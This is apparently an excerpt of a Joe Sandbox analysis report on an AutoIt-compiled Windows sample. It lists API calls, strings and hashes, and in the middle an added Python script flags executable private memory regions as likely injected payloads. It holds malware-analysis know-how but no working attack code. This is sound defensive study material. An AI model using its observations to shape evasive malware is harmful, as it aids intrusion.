• Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: pbL$%I
                    • API String ID: 3964851224-1578263234
                    • Opcode ID: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                    • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                    • Opcode Fuzzy Hash: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                    • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                    • API String ID: 0-2838938394
                    • Opcode ID: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                    • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                    • Opcode Fuzzy Hash: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                    • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                    APIs
                    • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                    • FindClose.KERNEL32(00000000), ref: 0046448B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                    • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                    • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                    • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                    • timeGetTime.WINMM ref: 00410D16
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                    • Sleep.KERNEL32(0000000A), ref: 00410E61
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                    • DestroyWindow.USER32 ref: 00410F06
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                    • TranslateMessage.USER32(?), ref: 00445C60
                    • DispatchMessageW.USER32(?), ref: 00445C6E
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                    • API String ID: 4212290369-1082885916
                    • Opcode ID: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                    • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                    • Opcode Fuzzy Hash: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                    • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorFreeLast
                    • String ID:
                    • API String ID: 1762890227-0
                    • Opcode ID: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                    • Instruction ID: 6e1140565c54ce0ca2718fb79faf2203ef12f7076210689dba49f4739c9f3729
                    • Opcode Fuzzy Hash: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                    • Instruction Fuzzy Hash: 00F14560D4D3819EDB3647288C09736AEE4EF72770F4C07DAE0D5960F2EE649F058226
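
The dump names in the Memory Dump Source lines encode where each analysed function lived. The entries above come from two places: the image mapping at 00400000 (protection 00000020, type 01000000) and a region at 00AE0000 that the report marks "based on PE: false" with protection 00000040 and type 00020000, that is an executable, writable, private allocation with no module behind it. Executable memory that no file on disk backs is the usual footprint of an unpacked or injected payload, so it is the first dump to pull. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it decodes the base, protection and type fields of those names against the Win32 PAGE_* and MEM_* constants and flags executable non-image regions. The field positions are an assumption inferred from the names on this page (the report does not document them), and the sample lines are constructed copies of the report's own entries.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Win32 page-protection values (winnt.h); the low byte of the protect field.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD, PAGE_NOCACHE = 0x100, 0x200
EXEC_MASK, WRITE_MASK = 0xF0, 0xCC   # any PAGE_EXECUTE_* / any writable or write-copy page
# MEMORY_BASIC_INFORMATION.Type values.
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPE = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed layout of a Joe Sandbox .sdmp name, inferred from the names on this page:
#   <proc>.<snap>.<id>.<base>.<protect>.<unk6>.<type>.<unk8>.sdmp
# Only <base>, <protect> and <type> are decoded; their values line up exactly with
# the Win32 constants above. The two remaining fields are kept as opaque numbers.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<unk6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<unk8>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)


@dataclass
class Region:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")]
        if self.protect & PAGE_GUARD:
            names.append("PAGE_GUARD")
        if self.protect & PAGE_NOCACHE:
            names.append("PAGE_NOCACHE")
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def suspicious(self) -> bool:
        # Executable memory outside an image mapping: nothing on disk backs those
        # bytes, so they were written at run time (unpacked or injected code).
        return self.executable and self.mem_type != MEM_IMAGE


def parse_sdmp(text: str) -> Optional[Region]:
    """Decode the first .sdmp name in a report line; None if none matches the layout."""
    m = SDMP_RE.search(text)
    if not m:
        return None
    return Region(name=m.group(0), base=int(m.group("base"), 16),
                  protect=int(m.group("protect"), 16), mem_type=int(m.group("type"), 16))


def triage(lines: Iterable[str]) -> List[Region]:
    """Distinct regions named in the given report lines that deserve a dump review."""
    seen, hits = set(), []
    for line in lines:
        r = parse_sdmp(line)
        if r and r.name not in seen:
            seen.add(r.name)
            if r.suspicious:
                hits.append(r)
    return hits


# Constructed sample: three lines in the shape of this report's Memory Dump Source entries.
SAMPLE_LINES = [
    "Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
    "Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp",
    "Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = parse_sdmp(line)
        print(f"{r.base:#010x} {r.protect_name:<24} {r.type_name:<12} suspicious={r.suspicious}")
```

Note that the 0052A000 region is also PAGE_EXECUTE_READWRITE, but its type is MEM_IMAGE: a writable executable section inside the loaded module, which is what a self-modifying stub looks like, not a second payload. The script keeps the image/non-image distinction so that only the 00AE0000 allocation is reported.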

                    Control-flow Graph: rendered image not reproduced (entry block 00469155-00469205, exit block 00469548-00469558; Executed/Not Executed shading omitted)
                    APIs
                      • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                    • __wsplitpath.LIBCMT ref: 00469234
                      • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                    • _wcscpy.LIBCMT ref: 00469247
                    • _wcscat.LIBCMT ref: 0046925A
                    • __wsplitpath.LIBCMT ref: 0046927F
                    • _wcscat.LIBCMT ref: 00469295
                    • _wcscat.LIBCMT ref: 004692A8
                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                    • _wcscmp.LIBCMT ref: 004691EF
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                    • _wcsncpy.LIBCMT ref: 004694C5
                    • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                    • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                    • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                    • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                    • LoadIconW.USER32(000000A9), ref: 004030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                    • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                    • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                    • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                    • LoadIconW.USER32(000000A9), ref: 004030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                    • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                    • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                    • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                    Control-flow Graph: rendered image not reproduced (entry block 0040708B-004071B0, exit block 004071B6-004071D3; Executed/Not Executed shading omitted)
                    APIs
                      • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                      • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                    • RegCloseKey.ADVAPI32(?), ref: 0043E947
                    • _wcscat.LIBCMT ref: 0043E9A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                    • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                    • Opcode Fuzzy Hash: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                    • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                    Control-flow Graph: rendered image not reproduced (entry block 00403633-00403681, exit block 004036D8-004036DE; Executed/Not Executed shading omitted)
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                    • KillTimer.USER32(?,00000001), ref: 004036FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                    • CreatePopupMenu.USER32 ref: 0040373E
                    • PostQuitMessage.USER32(00000000), ref: 0040374D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%I
                    • API String ID: 129472671-1195164674
                    • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                    • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                    • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                    • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                    • LoadIconW.USER32(00000063), ref: 00403A76
                    • LoadIconW.USER32(000000A4), ref: 00403A88
                    • LoadIconW.USER32(000000A2), ref: 00403A9A
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                    • RegisterClassExW.USER32(?), ref: 00403B16
                      • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                      • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                      • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                    • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                    • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                    • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                    • Instruction ID: af0522e5d3063f6fdae7a48ed59c0aca245d97b28f83adb6a4b709605a6e755e
                    • Opcode Fuzzy Hash: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                    • Instruction Fuzzy Hash: 6EA27A7190D3C08FC735CB1AC854BAABBE1AFD5328F094A5DE49897292D335AD05CB93

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                    • API String ID: 1825951767-3937808951
                    • Opcode ID: 1353912382c4c0e1f77a518e7e44a79a3158d89e17be8042cd3d853c7bd06722
                    • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                    • Opcode Fuzzy Hash: 1353912382c4c0e1f77a518e7e44a79a3158d89e17be8042cd3d853c7bd06722
                    • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
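
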